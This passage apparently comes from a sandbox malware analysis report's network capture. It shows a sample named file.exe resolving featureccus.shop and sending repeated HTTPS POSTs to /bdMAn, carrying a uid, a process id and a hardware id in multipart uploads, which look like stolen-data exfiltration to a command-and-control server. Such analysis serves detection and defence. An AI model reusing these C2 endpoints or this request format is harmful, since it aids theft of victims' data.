Mar 10, 2025 21:03:17.242979050 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.265724897 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.266459942 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.266494989 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.266607046 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.266638041 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.266738892 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.266776085 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.266905069 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.266927004 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267075062 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267093897 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267249107 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267277002 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267288923 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267308950 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267421961 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267452955 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267461061 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267474890 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267606020 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267642975 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267648935 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267668009 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267669916 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267702103 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267806053 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267838001 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267848969 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:17.267848969 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:17.267868996 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:19.350910902 CET	443	49700	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:19.352554083 CET	49700	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:19.416937113 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:19.416987896 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:19.417155981 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:19.417886019 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:19.417900085 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.071944952 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.072169065 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.075155973 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.075170040 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.075424910 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.082248926 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.082281113 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.082380056 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.817564011 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.826675892 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.826764107 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.826829910 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.826845884 CET	443	49702	172.67.204.104	192.168.2.6
Mar 10, 2025 21:03:21.826862097 CET	49702	443	192.168.2.6	172.67.204.104
Mar 10, 2025 21:03:21.826867104 CET	443	49702	172.67.204.104	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 21:02:59.029342890 CET	49660	53	192.168.2.6	1.1.1.1
Mar 10, 2025 21:02:59.038496971 CET	53	49660	1.1.1.1	192.168.2.6
Mar 10, 2025 21:02:59.040519953 CET	49782	53	192.168.2.6	1.1.1.1
Mar 10, 2025 21:02:59.053060055 CET	53	49782	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 10, 2025 21:02:59.029342890 CET	192.168.2.6	1.1.1.1	0x7aa	Standard query (0)	defaulemot.run	A (IP address)	IN (0x0001)	false
Mar 10, 2025 21:02:59.040519953 CET	192.168.2.6	1.1.1.1	0x2697	Standard query (0)	featureccus.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 10, 2025 21:02:59.038496971 CET	1.1.1.1	192.168.2.6	0x7aa	Name error (3)	defaulemot.run	none	none	A (IP address)	IN (0x0001)	false
Mar 10, 2025 21:02:59.053060055 CET	1.1.1.1	192.168.2.6	0x2697	No error (0)	featureccus.shop		172.67.204.104	A (IP address)	IN (0x0001)	false
Mar 10, 2025 21:02:59.053060055 CET	1.1.1.1	192.168.2.6	0x2697	No error (0)	featureccus.shop		104.21.93.43	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

featureccus.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49694	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:01 UTC	266	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: featureccus.shop
2025-03-10 20:03:01 UTC	61	OUT	Data Raw: 75 69 64 3d 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 26 63 69 64 3d Data Ascii: uid=c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79&cid=
2025-03-10 20:03:01 UTC	788	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:01 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsGLLs04dC4P%2FL4%2FC%2FYMdhkcC8hw5PQJJJqOlwZkFqOhBnr%2BbBarwfNcACIx8TCCif%2BInlFDA09fi1y3dqHHuw3vQ1qswlfm%2Bg%2FJPM6RUSATxWT0Fx8wb1BIc3pY2nsmYs1i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e569bc8b884261-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9869&min_rtt=9365&rtt_var=3003&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=963&delivery_rate=301855&cwnd=32&unsent_bytes=0&cid=bb4abc9c67acc685&ts=1205&x=0"
2025-03-10 20:03:01 UTC	581	IN	Data Raw: 07 b6 22 b1 4c 0c b2 0c cf 08 88 3c ac 19 e5 be 7e 73 e0 d2 e4 0c 0d 94 e2 6e 91 36 ef 50 a6 13 72 b5 6c 46 06 6b ac 3d a5 73 7c f0 0a 26 b2 0d 6c e7 ce f8 d8 7c 2f 67 69 1e 53 43 e2 dc 4b d6 54 b8 99 66 a5 34 c2 b8 70 46 22 22 33 d4 f0 40 29 0f bc 6c 79 c4 d2 d8 97 ba 18 53 5e 58 62 60 19 ce 56 9a d8 35 98 0b ba d2 86 2c 38 69 ac ee 4c 98 cc d3 22 20 5e dc a3 f3 62 c9 53 b0 9e f3 5b 47 70 cb fd 7f e3 82 a9 d9 93 7c 13 5a 9c 44 ff ab 93 56 bd d7 99 f3 54 6b 84 a3 99 d9 5c 35 d0 c7 79 3f 41 64 a5 6c 01 95 c0 b6 da e1 19 0c a5 d4 be de 97 3d 20 d3 28 bc 60 90 0a 2f 1d 9c ba 60 1f 64 a6 7a af c3 4a 26 47 58 33 a2 56 84 18 af 7f 65 89 35 a7 f9 11 f3 30 b8 ca bb c3 71 13 6f 38 e8 68 12 16 0b 0f 95 78 32 f3 96 46 e9 86 d9 10 8d 6f d8 d5 8b b7 fb 8c 30 4c 8c c0 Data Ascii: "L<~sn6PrlFk=s\|&l\|/giSCKTf4pF""3@)lyS^Xb`V5,8iL" ^bS[Gp\|ZDVTk\5y?Adl= (`/`dzJ&GX3Ve50qo8hx2Fo0L
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: 9c 78 74 66 b9 c6 03 04 6c 87 20 8d e9 f9 69 5b 66 1e d4 2b 54 f2 62 4f 26 d0 3e 3c b6 c3 03 6d b0 61 db c3 65 d9 fa ea 89 be dc 07 e2 6e 7e 3f 8f 4f 47 bf 97 33 ba ba 08 a3 f5 45 15 68 0f 24 9d 4a a1 b3 5d cd 9a 56 4d b9 f7 eb e3 28 fc c4 4f 37 04 04 da 76 43 04 4f 2a 06 9a 1a b2 19 f4 86 f1 a5 9d 25 ef d2 dd 42 c3 a5 65 fe 70 10 fa 6f fb bb e1 b0 06 71 87 1c ff 76 9c 71 2f 73 f1 c4 b2 d4 ca 11 76 ff d2 8c 5a f4 ff bb ff 1c b3 4e 3f 8f 17 d9 a6 b7 3e b1 9d 1d 83 1c 5b 7c 2a ae 7e 73 80 c3 5d e7 ca 4d 80 44 25 ad 84 a7 84 42 1e f3 2b fb 01 84 6a a7 e6 5c 03 3b c9 a6 1d aa 13 58 e5 f4 e0 8d 0d b9 bb 9c 51 38 3a db 1e fa 1f 24 f7 a2 5a 4e 49 84 ce 8f a7 ed 16 f7 91 b3 01 7a 80 8c dd 36 fd 1c 80 b0 07 76 bf 1c 60 cb a5 bf 1b 68 43 30 04 7c dd 07 81 85 a4 11 Data Ascii: xtfl i[f+TbO&><maen~?OG3Eh$J]VM(O7vCO%Bepoqvq/svZN?>[\|~s]MD%B+j\;XQ8:$ZNIz6v`hC0\|
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: 60 a7 0d 06 b3 56 8a 47 69 71 e6 39 64 0e 36 fb 2c 95 3b b7 72 32 a7 ac 3a 38 83 1a 1f 6c 39 be ec d4 99 5b bb 93 03 01 c9 a0 a5 1c b6 41 08 d5 f6 bb db 37 c3 19 bd e3 85 39 cb 7d 9e 3e e0 9c b9 59 32 32 36 7d 66 88 7e a6 ac d0 16 26 b5 6c f5 64 94 83 de 16 db ee 26 ef c9 9d de 89 4e 11 8b 1a f9 79 f9 00 8e 5a ee 2d fc fb 6d 9e 6a 9b e3 77 91 db 45 df f6 ed 0a 15 ac 56 37 01 b2 97 cf 6f 75 84 ba e5 f0 94 40 fa e4 83 a6 3c ec 10 f9 76 d6 75 12 38 ae 99 b7 c1 11 05 df c1 ec 5b 8d ec 08 dc c8 83 42 4a d5 66 17 50 b6 58 07 f9 49 90 11 c3 80 5f b4 1f b7 29 e3 08 fa 35 b6 26 18 10 6e 47 e1 cf 99 f1 62 3d 50 09 14 cc 05 1f 98 d9 f6 d7 fd 2e 21 f0 e0 29 a7 a6 dd de 70 60 86 ae 5d 31 91 4f 90 03 f6 3f 45 92 52 3e e9 ce 34 2c 7a ca 45 c2 65 80 3b 43 0a 72 33 19 36 Data Ascii: `VGiq9d6,;r2:8l9[A79}>Y226}f~&ld&NyZ-mjwEV7ou@<vu8[BJfPXI_)5&nGb=P.!)p`]1O?ER>4,zEe;Cr36
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: 53 be 92 91 29 f2 91 ee 9b 64 52 44 9d db bf b4 bb b7 cc 34 29 10 5c 16 1f 61 60 cb 7a 72 7a f5 c3 17 dd 12 4f bd 97 a1 58 6c 06 be f9 7c 45 83 f3 06 e8 8f 47 56 22 cf 93 18 c7 d7 fe 8a 56 2a a5 2f 2b fb ed e7 5b 29 55 80 76 99 02 e7 c4 76 8f 7a b1 fa f8 ea 1a aa 6a 1b 9f 42 a9 4c 97 d8 74 38 1a d9 d9 c7 4d f1 1e 69 a5 4f ff 89 c0 c1 cc 07 dd 8a e6 b9 90 e4 ca 4d 55 ed 9b 74 e2 a5 7d 65 0c 00 65 42 f5 d4 98 b3 34 8d 7a dc 06 1d ec 54 77 56 bc 03 ac b5 9b 5d 48 a9 d3 b4 f1 6e 95 6b e5 a5 19 42 0d f8 2d 66 89 1e bc 39 76 07 bc 65 a4 00 d8 34 e5 24 1e ec 3c 88 ee b2 ed d0 f7 fa 23 f7 c5 9c c8 ea 8e d4 20 5c bd 53 ae b3 fb 3f bd 4a 1e 1f 0f 4c 8c cf cb 4a a2 c4 8f a2 98 1b 04 21 11 81 51 7b 99 fb 21 be c7 34 94 88 18 9f 90 4f c1 37 74 5d 63 d9 a2 ea f0 06 06 Data Ascii: S)dRD4)\a`zrzOXl\|EGV"V*/+[)UvvzjBLt8MiOMUt}eeB4zTwV]HnkB-f9ve4$<# \S?JLJ!Q{!4O7t]c
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: 32 59 88 77 46 df e4 4c f7 76 5c 07 ea ab 74 65 c2 ea 3a f2 04 4d d3 c7 30 17 e8 57 0b 34 f2 d5 3b 48 0d 8d 72 60 54 2d 5e 16 b2 c4 97 a9 a6 f3 ad 1d e3 78 a8 03 e4 16 92 c2 77 10 5d 17 88 80 d6 54 65 6a 41 0a 3d 09 e7 7a d5 c8 ec fb 8f c9 be 9e 9f 36 40 8a ce 78 a5 72 c3 2e fa ad 03 42 ef bf 4d f6 92 c4 76 96 95 be fa b0 b7 47 42 50 9c 65 06 b8 19 da 61 86 e3 59 e6 61 80 7e a6 6a ac 26 df 09 ce c7 d8 03 91 a3 15 41 d3 07 72 d7 55 bf 32 94 af c0 a9 03 a4 a4 7a d8 2c 03 14 21 d9 99 1d 1d aa ba 5c 38 d4 32 21 42 86 8c 20 29 aa 62 09 79 48 b1 71 90 53 14 22 2a 34 18 83 48 7c 5c ad d8 65 96 5d 8a 04 fe 8a f0 db 92 68 a7 89 f5 8f 12 fa c8 14 65 77 2d 8e 83 b7 7b 0e 5e 84 3c 11 05 8e f1 00 f1 e9 da 7d 87 16 03 8a 69 4c a3 6a 86 31 a6 b8 32 9f e9 f9 75 8a 5f b1 Data Ascii: 2YwFLv\te:M0W4;Hr`T-^xw]TejA=z6@xr.BMvGBPeaYa~j&ArU2z,!\82!B )byHqS"*4H\|\e]hew-{^<}iLj12u_
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: d5 34 56 a7 64 35 d7 ef 85 07 45 d3 fa c9 ec 74 f8 13 da dd 22 1e 8d ef 6b 4e b9 08 2f 9d 7a 0a 58 ab ad bb 2a dc 9a c3 1c 25 4d 3c 2c a4 71 64 5c c0 f0 48 2f 47 a3 90 ce 48 97 d7 90 7f f0 28 da 95 43 23 5b 7a 1a b8 44 bf 53 70 97 9a 9f 48 93 43 70 d0 60 f7 63 89 dc cd 7c cc 34 f2 eb 0c 83 6e df 84 8d a1 b8 85 8f 4e 61 06 80 15 1d 00 c8 67 5a 96 ff 71 6d 88 45 81 18 cf f6 ef 03 9d ca 0c 4e 31 42 ef 8c 65 31 d6 23 25 7b ae 85 6a ed b5 5e e5 0d 54 3a 09 f4 1c 8f 82 68 52 a8 27 68 5c 92 e7 37 dd 26 7a 3b b9 16 39 62 9e 2b ab c7 ff 4e f9 77 26 f6 62 ef ee db ad 9b 89 a1 59 5e 80 cd 67 85 70 d7 19 0d 92 cb 61 9b 68 96 07 7c 0b 94 e6 8e 98 64 d4 d0 32 1a 23 93 8b 19 78 ca b3 34 69 bf b4 5b 1a 5c 02 1c da 5e c4 44 da ee 89 89 50 07 bf 6f f8 b5 5a 02 9e 79 4e 1a Data Ascii: 4Vd5Et"kN/zX*%M<,qd\H/GH(C#[zDSpHCp`c\|4nNagZqmEN1Be1#%{j^T:hR'h\7&z;9b+Nw&bY^gpah\|d2#x4i[\^DPoZyN
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: f5 a7 7e 9c ff b3 ea 78 a5 18 c7 ce 02 59 72 e6 64 82 94 55 0d 34 b8 56 25 b3 02 7e 83 5f ae 5b c2 87 d0 f7 76 e6 7f 0f ed 15 f9 30 89 90 46 5b ac 25 aa f6 82 a3 1f 69 06 46 1a 5e 5e 95 96 08 5c 3e 0c af 4e 4b 75 06 8f c1 ab 7d 59 df 74 6e a4 ba 6c 8e da cc 72 19 fa c5 ab d2 0a 70 b4 7a e4 96 e8 7a 49 dd e7 54 90 33 56 f4 71 29 ac 09 62 c4 3e d5 eb 83 d2 d2 d0 5e aa 0a 02 97 38 15 bc 7b 3a d5 33 c0 9a b9 d6 bd 9c 2e 81 3e 42 6a b2 be 6d bf 7b 6b d0 9d 28 84 cb 16 9a 2e a5 81 0f 22 f0 a0 16 71 f8 92 8b cc 88 73 da 4d 6f 44 bb 6d cb 77 95 f4 a0 9f 60 92 62 89 8d c5 6a 05 49 ef 5d ae d9 0a f0 7b 72 b8 3e 22 f5 63 2a 9a f1 50 0d c5 c2 07 e6 e3 2c be 97 fd 45 74 41 76 da 4c 15 0c 81 c0 91 0a b0 a0 cc 9b 37 39 e0 6a d9 2a e3 d8 bd d2 e3 49 54 43 fb 74 10 00 6b Data Ascii: ~xYrdU4V%~_[v0F[%iF^^\>NKu}YtnlrpzzIT3Vq)b>^8{:3.>Bjm{k(."qsMoDmw`bjI]{r>"cP,EtAvL79jITCtk
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: 0f 99 24 1d ce af e4 45 83 6f 8f ec a2 f6 cd 2e 78 8b 33 6e 62 ed 83 05 69 ea cc a0 fc c0 ca 05 95 69 90 07 0a e5 1b db 0f 95 bf 48 7d c1 0e b1 32 00 de 95 8b f2 fd 87 21 80 38 01 12 95 7b 67 43 67 a5 63 6c 6e 03 e5 e2 45 da eb ad a3 d0 14 c2 c8 4b cc 5f fb 19 a7 aa 8c 36 39 23 14 3b 5c 57 4d 88 7c 8b 98 da 37 dc 5e b8 6c d1 7a c4 77 28 93 31 63 40 04 16 62 a4 4b c4 c2 c5 34 57 58 e7 c6 f5 b7 f3 1a f1 99 58 fe ed b5 06 e4 3d 05 99 f6 c3 53 17 a6 10 05 51 d5 7f 8c f7 59 d9 41 e7 e9 a5 01 3a f5 32 d5 2f 24 7d a5 d5 82 3c b5 05 8e ea 89 84 be bb 0d 28 df 71 7f 4c 01 f9 dc f5 75 db bf ec c3 d1 f2 7a 64 7a 64 2d 7a 8f 2f c4 85 e2 4c 0e a4 78 39 f9 6f 2f 52 7a bf 65 a7 b1 72 3d 0c 3c d7 28 0b f7 d9 9c 87 52 22 aa da c7 03 b0 86 3a 59 da e6 43 7e 5a 64 61 05 a7 Data Ascii: $Eo.x3nbiiH}2!8{gCgclnEK_69#;\WM\|7^lzw(1c@bK4WXX=SQYA:2/$}<(qLuzdzd-z/Lx9o/Rzer=<(R":YC~Zda
2025-03-10 20:03:01 UTC	1369	IN	Data Raw: 42 2a 01 d7 c7 f0 35 56 80 fb 2c 6d 26 61 8a cf 32 f2 1d d0 b7 35 9e 30 f7 ba 00 14 57 82 07 b5 41 41 12 ca be 0f dd 1b 08 9a 34 bc 22 2b 6d e2 86 0e c5 eb 8d 38 d0 e9 d9 9d a7 b9 03 07 45 ad 05 92 80 e1 28 2f ac f1 c9 a1 a5 4c 2b 47 d7 07 f6 f4 46 b7 40 d3 a4 82 ad bd a0 bc 03 b0 df 68 f0 d7 39 a8 ea 45 1c dc 28 4d f5 2f 4b 54 ee 96 f8 e0 33 02 5b 50 de 7a ad 0a b6 70 e9 50 22 83 69 db 86 01 9b 0a df 46 dd 7c eb 9f da 09 c1 ee 53 bd 07 8a 11 62 81 9c e8 ba 6b 79 28 8c 40 b8 14 fd f9 f5 2e b0 3b f3 8c 50 b9 c5 d1 36 8d 14 73 bb d0 20 74 94 3b 46 92 31 69 73 dd 8a c7 e0 2a 7b 61 4f 90 c1 f9 28 5e d1 5b 37 3d 29 30 5b ec 8a 9f 88 d9 4a 28 5b 4e a6 bf ca 3a 7c 2a 38 ea b6 f3 a7 b6 75 79 60 63 96 86 32 88 58 17 41 97 79 e8 a9 f5 ef 4f 77 71 db a6 71 87 c1 5f Data Ascii: B5V,m&a250WAA4"+m8E(/L+GF@h9E(M/KT3[PzpP"iF\|Sbky(@.;P6s t;F1is{aO(^[7=)0[J([N:\|*8uy`c2XAyOwqq_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49695	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:03 UTC	276	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3LEEVpaNMa User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14889 Host: featureccus.shop
2025-03-10 20:03:03 UTC	14889	OUT	Data Raw: 2d 2d 33 4c 45 45 56 70 61 4e 4d 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 0d 0a 2d 2d 33 4c 45 45 56 70 61 4e 4d 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4c 45 45 56 70 61 4e 4d 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 45 39 34 39 37 37 31 32 42 30 32 36 37 45 Data Ascii: --3LEEVpaNMaContent-Disposition: form-data; name="uid"c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79--3LEEVpaNMaContent-Disposition: form-data; name="pid"2--3LEEVpaNMaContent-Disposition: form-data; name="hwid"F72E9497712B0267E
2025-03-10 20:03:04 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYWgxsM8qPptv1G2oInZmUooGH5wLF2tLz0ejLTx80Dbv%2Fvm9k7a9Pp5TV7Z%2BMEBpJ8L583DOXDd8ODqKMNuDiLQPAsuJCMj3Yi%2Bc0YWaieCmXJclwL5tKsNmTlh1pMNC%2BEz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e569cedef407ec-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3725&min_rtt=3562&rtt_var=1130&sent=16&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15823&delivery_rate=738964&cwnd=250&unsent_bytes=0&cid=075b14c35fd24f32&ts=975&x=0"
2025-03-10 20:03:04 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}
2025-03-10 20:03:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49696	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:07 UTC	277	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C49ENFqui8h User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15075 Host: featureccus.shop
2025-03-10 20:03:07 UTC	15075	OUT	Data Raw: 2d 2d 43 34 39 45 4e 46 71 75 69 38 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 0d 0a 2d 2d 43 34 39 45 4e 46 71 75 69 38 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 34 39 45 4e 46 71 75 69 38 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 45 39 34 39 37 37 31 32 42 30 32 Data Ascii: --C49ENFqui8hContent-Disposition: form-data; name="uid"c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79--C49ENFqui8hContent-Disposition: form-data; name="pid"2--C49ENFqui8hContent-Disposition: form-data; name="hwid"F72E9497712B02
2025-03-10 20:03:08 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yKIFRO4mluNxxxC00NOXRANSjNne%2BZlmiza7C16rGOr8w5%2FQZIhY%2FsFj6F2%2FjJk15dMgemoAX1R%2F4XhTbBgm1L8myRtEQ7IaUo4a38%2BYdsl2V%2FlODt9jRWCxHMWtq80JQTl4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e569e49c0b2000-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4986&min_rtt=4926&rtt_var=1437&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16010&delivery_rate=586947&cwnd=245&unsent_bytes=0&cid=653712a8bb46a83b&ts=923&x=0"
2025-03-10 20:03:08 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}
2025-03-10 20:03:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49697	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:10 UTC	281	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K499FGNsH7JDQRS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19952 Host: featureccus.shop
